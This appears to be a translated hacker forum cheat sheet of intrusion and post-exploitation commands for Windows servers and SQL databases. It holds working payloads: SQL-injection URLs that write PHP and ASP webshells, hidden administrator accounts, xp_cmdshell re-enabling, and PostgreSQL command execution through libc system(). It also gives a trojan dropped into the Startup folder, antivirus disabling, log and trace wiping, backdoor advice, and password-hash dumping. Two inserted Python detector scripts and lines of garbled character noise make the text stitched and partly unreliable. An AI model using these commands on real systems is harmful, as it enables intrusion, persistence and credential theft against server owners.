1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore it.
2. A rather clever way to build a cloned account
First create an ordinary user account,
then export its registry entry, then delete the account in Computer Management,
then re-import the entry and add the account to the Administrators group.
3. Reading the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a key named "services.exe",
then under it create a string value
whose data is the full path of the trojan.
5. runas /user:guest cmd
Test the user's privileges!
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This actually uses the tlntadmn command. For details, run it with /? (this requires administrator rights). Creating an identical user and passing NTLM authentication needs no explanation from me, right?
7. Post-intrusion vulnerability patching, trace cleanup, and backdoor placement:
Basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection consider removing xp_treelist and xp_regread, and note the web directory for yourself. You must remember to clean up traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers. Delete them. When clearing IIS logs, do not use an AIO-type tool that deletes the whole log; use a logcleaner-type tool that removes only the access records for a specified IP. If you can get the administrator password via GINA, log in as him to clean the logs, then do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave a backdoor that produces no log records. I usually leave at least several one-line backdoors, a standard backdoor, and a cfm backdoor. Remember to change the timestamps. There is also a nastier trick: if the machine is just an ordinary zombie, drop a TXT file on the administrator's desktop telling him you broke in, placed a certain backdoor, and added a certain user (not your real important backdoor, of course) and ask him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9: MSSQL Server 2005 has xp_cmdshell disabled by default.
To enable it you must switch it on under the advanced options.
This can be injected directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. New way to restore xp_cmdshell
After the extended stored procedures have been deleted there is a very simple way to restore them:
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, regardless of whether sp_addextendedproc exists.

-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Check whether the extended stored procedure exists
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
SQL statement to block cmdshell
sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clearing the 3389 login records uses a single built-in system command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
Viewing the current user's privileges in MySQL
show grants for

The following statements give the same privileges as the root user. You have probably run into this when taking a site: the MySQL root user can only connect locally and refuses remote connections. The method below solves that. The statements create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints.
Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro` ;

Getting SYSTEM privileges from the current user
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the CAPTCHA restriction to get into the back end and get a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
Save as code.reg, import it into the registry, restart IE,
and that is it.
Writing a shell via UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Used against the dedecms injection vulnerability: writing a shell without the back end.
In the dedecms back end, when there is no file manager and no outfile privilege:
under Plugin Management - Virus Scan,
write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.

In Oracle, after logging in as a low-privileged user, you can run the following statement to query the hashes of sys and other users, then crack them with Cain
Code:
select username,password from dba_users;

MySQL remote connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

1. Query the terminal port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Universal: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg

2. Enable Terminal Services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3. Change the terminal port to 20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 system firewall restriction on the Terminal Services port 3389 and on IP connections

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. Enable the Win2000 terminal on port 3389 (requires reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg

6. Force a reboot of Win2000 & Win2003 (the system reboots automatically once the last line has run)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (requires reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8. When the terminal has exceeded its maximum number of connections, use the following command to connect

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of the C: drive)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Deleting the registry value for awgina.dll
Code:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to disable LM hashes

Database security: common commands for attacking Oracle databases
I recently ran into a server that used an Oracle database; after cramming Oracle and asking the experts, I finally got hold of all the user passwords for the site's back-end management interface. I found Oracle really cumbersome to work with, so to save my brothers some detours later I have compiled the commands needed during the intrusion.
1. su - oracle   Not required; suitable when you have no DBA password, since it lets you enter the sqlplus interface without a password.
2. sqlplus /nolog  or  sqlplus system/manager  or  ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper)  or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup;   start the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$databases;   view the database structure fields
7. How to see which users have SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user;   view the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View the table structure: desc all_tables;
12. Show all column definitions of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant the user privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords (change the sys and system passwords to test):
alter user sys identified by test;
alter user system identified by test;

applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml   database connection configuration
\WEB-INF\server.xml   similar to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml   file directory structure

spring.properties contains the name of the hibernate.cfg.xml

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of them can be found, look at the class files.
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:

create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

Viewing the shared folders inside a virtual machine
Run in cmd inside the VM:
\\.host\Shared Folders

Trick for finding the terminal port from a cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs;
the service name corresponding to the terminal is TermService.
Step 2: netstat -ano lists the PID for every port;
find the port that matches the PID.

Querying password hashes in SQL Server 2005
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from Access

Complete code for adding a user through MySQL on a Chinese-language OS:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:
use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;
create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;

A note on how to deal with that obnoxious Norton
Look up the path of the Norton service
sc qc ccSetMgr
Then set permissions to deny access. Go all the way.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server
iisreset /reboot
That takes care of it. But once you are done, remember to restore the permissions.
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
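The xp_cmdshell enabling/restoring statements in section 9-10 and the split-literal EXEC('ma'+'ster..x'+...) form above are what a defender's query filter or audit-log review has to recognise. The following Python is an added example, not code from the original post: it folds T-SQL string-literal concatenation back together before matching procedure names, so the split form is caught the same way as the plain one. The watched-procedure list and the sample statements are constructed for the example.

```python
import re

# Procedure names the notes above use to reach the OS or re-enable xp_cmdshell.
WATCHED_PROCS = (
    "xp_cmdshell",
    "sp_oacreate",
    "sp_oamethod",
    "sp_addextendedproc",
    "sp_dropextendedproc",
    "addextendedproc",
    "sp_configure",
    "xp_dirtree",
    "xp_regread",
)

# A T-SQL string literal: single-quoted, with '' as the escaped quote.
LITERAL = r"'(?:[^']|'')*'"
# Two literals joined by '+', possibly across whitespace or newlines.
CONCAT = re.compile(rf"({LITERAL})\s*\+\s*({LITERAL})")


def fold_concat(sql):
    """Merge 'a'+'b' chains into one literal until nothing is left to fold."""
    prev = None
    while prev != sql:
        prev = sql
        # Drop the closing quote of the left literal and the opening quote of
        # the right one; the escaped '' inside the literals is left untouched.
        sql = CONCAT.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], sql)
    return sql


def find_watched(sql):
    """Return the watched procedure names present once concatenation is folded."""
    folded = fold_concat(sql).lower()
    return [name for name in WATCHED_PROCS if name in folded]


# Constructed samples: the split form from the notes, the sp_oacreate form,
# and a benign query that must not be flagged.
SAMPLES = {
    "split": "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "ole": "declare @shell int exec sp_oacreate 'wscript.shell',@shell output "
           "exec sp_oamethod @shell,'run',null,'cmd.exe /c whoami'",
    "benign": "SELECT top 1 name FROM sysobjects WHERE xtype='U'",
}

if __name__ == "__main__":
    for label, stmt in SAMPLES.items():
        print(label, "->", fold_concat(stmt), find_watched(stmt))
```

A plain substring match on the raw statement misses the split form entirely; matching after fold_concat catches it, which is the check worth adding to any keyword-based filter.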

Some PostgreSQL injection stuff
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom libc-backed function, the other uses pl/python.
Naturally, the PostgreSQL version has to be above 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, redirecting its output to a file for the output table:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the command's output back from the table to check whether it ran successfully
SELECT system_out FROM stdout

Test example below

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess   stop the default firewall
netsh firewall show   show/config the default firewall
netsh firewall set notifications disable   disable the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost   add a program to those allowed by the default firewall
Changing the 3389 port (harder to pick up in scans after the change)
Change the server-side port setting; two places in the registry need to be modified
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
the PortNumber value, 3389 by default; change it to the port you want, e.g. 6000
Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
the PortNumber value, 3389 by default; change it to the port you want, e.g. 6000

That is all; reboot the system and it takes effect.

Script to log 3389 remote logins
Save as a .bat file
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer

mstsc parameters:

Remote Desktop Connection
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.
/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.
/h:<height> -- specifies the height of the remote desktop screen.
/edit -- opens the specified .rdp file for editing.
/migrate -- migrates legacy connection files created by Client Connection Manager
to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which is equivalent to logging on to the computer a second time. In other words, connecting with the console parameter gives you the desktop shown on the monitor. Give it a try; it comes in handy at times, especially with some software that
mstsc /console /v:124.42.126.xxx   bypasses the terminal connection limit

Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
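The registry settings these notes keep returning to (the Image File Execution Options key under services.exe in section 4, GinaDLL under Winlogon, fDenyTSConnections, the Terminal Server PortNumber, SpecialAccounts\UserList for the hidden asp.net account, and NoLMHash) can all be audited from a regedit /e export. The following Python is an added example, not code from the original post: it parses a .reg text in the same format the Win2000 echo script above produces and flags those settings. The value name Debugger is the one Windows reads under an IFEO key; the sample export, its paths and the finding wording are constructed for the example.

```python
import re

# Constructed sample export. A real regedit /e file is UTF-16LE; decode it
# to str before passing it to parse_reg().
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="C:\\Temp\\dropper.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"asp.net"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000001
"""

RDP_DEFAULT_PORT = 0xD3D  # 3389

SECTION = re.compile(r"^\[(.+)\]$")
# "name"=data  or  @=data ; the name may contain escaped quotes.
VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def decode_value(raw):
    """Decode the .reg data syntaxes used on this page: dword:HEX and "string"."""
    raw = raw.strip()
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw  # hex(...) blobs and other forms are left undecoded


def parse_reg(text):
    """Return {key_path: {value_name_lower: value}} from .reg export text."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "Windows Registry Editor", "REGEDIT4")):
            continue
        m = SECTION.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            keys[current][name.lower()] = decode_value(m.group(3))
    return keys


def audit(keys):
    """Flag the persistence and exposure settings described in the notes."""
    findings = []
    for path, values in keys.items():
        lp = path.lower()
        # Section 4: a Debugger value under IFEO\<exe> runs in place of that exe.
        if "\\image file execution options\\" in lp and "debugger" in values:
            exe = path.rsplit("\\", 1)[1]
            findings.append(f"IFEO debugger hijack on {exe}: {values['debugger']}")
        # A third-party GINA (awgina.dll in the notes) sees every logon password.
        if lp.endswith("\\winlogon") and "ginadll" in values:
            findings.append(f"custom GinaDLL registered: {values['ginadll']}")
        # Accounts set to 0 here are hidden from the logon screen.
        if lp.endswith("\\specialaccounts\\userlist"):
            for name, v in values.items():
                if v == 0:
                    findings.append(f"account hidden from logon screen: {name}")
        if lp.endswith("\\control\\terminal server") and values.get("fdenytsconnections") == 0:
            findings.append("Terminal Services connections enabled (fDenyTSConnections=0)")
        # Both places the notes patch when moving the RDP listener off 3389.
        if lp.endswith(("\\tds\\tcp", "\\winstations\\rdp-tcp")):
            port = values.get("portnumber")
            if isinstance(port, int) and port != RDP_DEFAULT_PORT:
                findings.append(f"RDP listener moved to port {port} ({path})")
        if lp.endswith("\\control\\lsa") and values.get("nolmhash") == 0:
            findings.append("NoLMHash=0: LM hashes still stored")
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(finding)
```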
Media
& U0 o* L3 {5 c3 ~) B( C1 I9 t& L<form id="frmUpload" enctype="multipart/form-data"
0 }6 n9 ^3 W8 f/ B1 p* ~action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br># s6 b) o! j" Q4 G: y" _9 _
<input type="file" name="NewFile" size="50"><br>
. O. Q& @- ]) N. J<input id="btnUpload" type="submit" value="Upload">1 h4 I2 {( O: `8 o0 s5 }3 }
</form> U( |0 [) q: `( D# V
" b6 I/ ~/ {( h4 V, Kcontrol userpasswords2 查看用户的密码. Z5 F5 U9 x+ g: |
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径* G; w! @/ e# \' B* a7 q" L4 X
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
9 V- }- F4 V/ c9 ]) }8 I" L
! M1 `9 a4 m) H! I141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:& Y& R; e$ e7 g4 J: Z* Q
测试1:
; Q& s q* T, l& F) iSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1" H3 _: q$ l4 n; L
3 s, E y7 c5 w2 W# `- X测试2:
2 B$ y/ {8 J$ g! T) E& }3 w/ Z) a3 Y5 l
create table dirs(paths varchar(100),paths1 varchar(100), id int);

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

How to shut down McAfee: // requires SYSTEM privileges, use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to get around McAfee's executable restriction.
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager

http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
Attachment: VNCDump.zip (4.76 KB)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump; it can also be read from the command line by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4].

exec master..xp_cmdshell 'net user'
Execute commands through MSSQL.

Query the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
MSSQL database shrink.

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar as a multi-volume archive with 200 MB volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to game.bak at D:\WebSites\game.com\UpFileList\game.bak.

